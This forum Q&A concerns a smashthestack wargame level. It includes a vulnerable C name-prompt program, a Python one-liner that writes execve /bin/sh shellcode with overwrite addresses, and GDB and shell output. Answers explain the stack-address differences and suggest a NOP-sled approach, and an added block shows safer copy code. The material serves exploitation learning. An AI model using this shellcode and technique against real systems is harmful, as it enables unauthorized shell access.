
Program behaves differently in GDB?

I have this code from smashthestack:

//bla, based on work by nnp

#include <stdio.h>
#include <string.h>
#include <unistd.h>   /* read() */

void prompt_name(char *name, char *msg){
        char buf[4096];

        int i = 0;
        puts(msg);
        i = read(0, buf, sizeof buf);
        printf("Read %d bytes\n", i);
        *strchr(buf, '\n') = 0;
        strncpy(name, buf, 20);
}

void prompt_full_name(char *fullname) {
        char last[20];
        char first[20];

        prompt_name(first, "Please enter your first name: ");
        prompt_name(last, "Please enter your last name: ");

        strcpy(fullname, first);
        strcat(fullname, " ");
        strcat(fullname, last);
}


int main(int argc, char **argv){
        char fullname[42];

        prompt_full_name(fullname);
        printf("Welcome, %s\n", fullname);

        return 0;
}

I execute this program using this shellcode:

python -c 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80" + "\x90" * 2009 + "\x90" * 2065 + "\n" + "\x80\xec\x02\xf4\xff\xbf\x03\xf4\xff\xbf\x04\xd4\xff\xbf\xa6\xfc\xff\xbf\xff" + "\n"' > /tmp/in

In GDB run < /tmp/in, it's working all right:

(gdb) run < /tmp/wliao_in
Starting program: /levels/level06 < /tmp/wliao_in
Please enter your first name: 
Please enter your last name: 
Welcome, j
          X�Rh//shh/bin��1�̀��������������� ����������������
Executing new program: /bin/bash

But in reality, it's not:

level6@io:/levels$ cat /tmp/in | ./level06
Please enter your first name: 
Please enter your last name: 
Welcome, j
          X�Rh//shh/bin��1�̀��������������� ����������������
Illegal instruction

I don't understand what's different between the two?

There are a lot of issues when running something in and out of GDB.

First off, the environment changes, as shown in this diff. Adding and removing environment variables changes the addresses of everything above them on the stack.

< _=./envp2
---
> COLUMNS=91
8a9
> LINES=39
20a22
> _=/usr/bin/gdb

Secondly, the execve path affects stack layout (you're using "./level06", but GDB uses the absolute path, "/levels/level06"). This probably appears both in argv[1] and at the bottom of the stack (I don't know why, but Linux does that).

It's been a really long time since I did that level, but I'd try putting the shellcode in a command line argument (so there's no size restriction), with a massive NOP sled (so the stack address changes don't make a difference to whether your exploit works or not).

prompt_name does not produce a name terminated by a \0 character if the name is longer than 20. The difference when run in gdb is that in gdb memory and stack management may be different, in which case both strings may by accident be terminated by a \0.

With names smaller than 20 characters it works fine with me.
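The termination point this answer makes can be checked directly. The following is an added example (not code from the question or from either answer): it reproduces the challenge's strncpy(name, buf, 20) copy to show when the 20-byte array ends up without a terminator, and places a bounds-safe copy and a snprintf-based fullname builder beside it. The sizes NAME_LEN and FULLNAME_LEN are taken from the posted program; the function names are my own.

```c
#include <stdio.h>
#include <string.h>

#define NAME_LEN 20          /* first[20] / last[20] in prompt_full_name */
#define FULLNAME_LEN 42      /* fullname[42] in main */

/* Same copy as the challenge binary. strncpy only writes '\0' padding when
 * the source is shorter than the count, so a name of 20 or more characters
 * leaves no terminator anywhere in the 20-byte array.
 * Returns 1 if the copied name is terminated, 0 if it is not. */
int unsafe_copy_terminated(const char *input) {
    char name[NAME_LEN];
    memset(name, 'X', sizeof name);          /* constructed stale stack bytes */
    strncpy(name, input, NAME_LEN);
    return memchr(name, '\0', sizeof name) != NULL;
}

/* Hardened copy: stop at the newline (or end of string) without
 * dereferencing a NULL from strchr, truncate to fit, and always write the
 * terminator. Returns the number of characters kept. */
int safe_copy_name(char *name, size_t name_sz, const char *input) {
    size_t n = strcspn(input, "\n");
    if (n >= name_sz)
        n = name_sz - 1;                     /* leave room for '\0' */
    memcpy(name, input, n);
    name[n] = '\0';
    return (int)n;
}

/* Runs safe_copy_name into a 20-byte array and returns strlen() of the
 * result, which is well defined only because the copy is terminated. */
int safe_copy_len(const char *input) {
    char name[NAME_LEN];
    memset(name, 'X', sizeof name);
    safe_copy_name(name, sizeof name, input);
    return (int)strlen(name);
}

/* Builds "first last" with snprintf instead of strcpy/strcat.
 * Returns 1 if the result fit in fullname[42], 0 if it was truncated. */
int fullname_fits(const char *first, const char *last) {
    char full[FULLNAME_LEN];
    int needed = snprintf(full, sizeof full, "%s %s", first, last);
    return needed >= 0 && (size_t)needed < sizeof full;
}

int main(void) {
    printf("20-char name terminated: %d\n", unsafe_copy_terminated("12345678901234567890"));
    printf("chars kept by safe copy: %d\n", safe_copy_len("ABCDEFGHIJKLMNOPQRSTUVWXYZ\n"));
    return 0;
}
```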
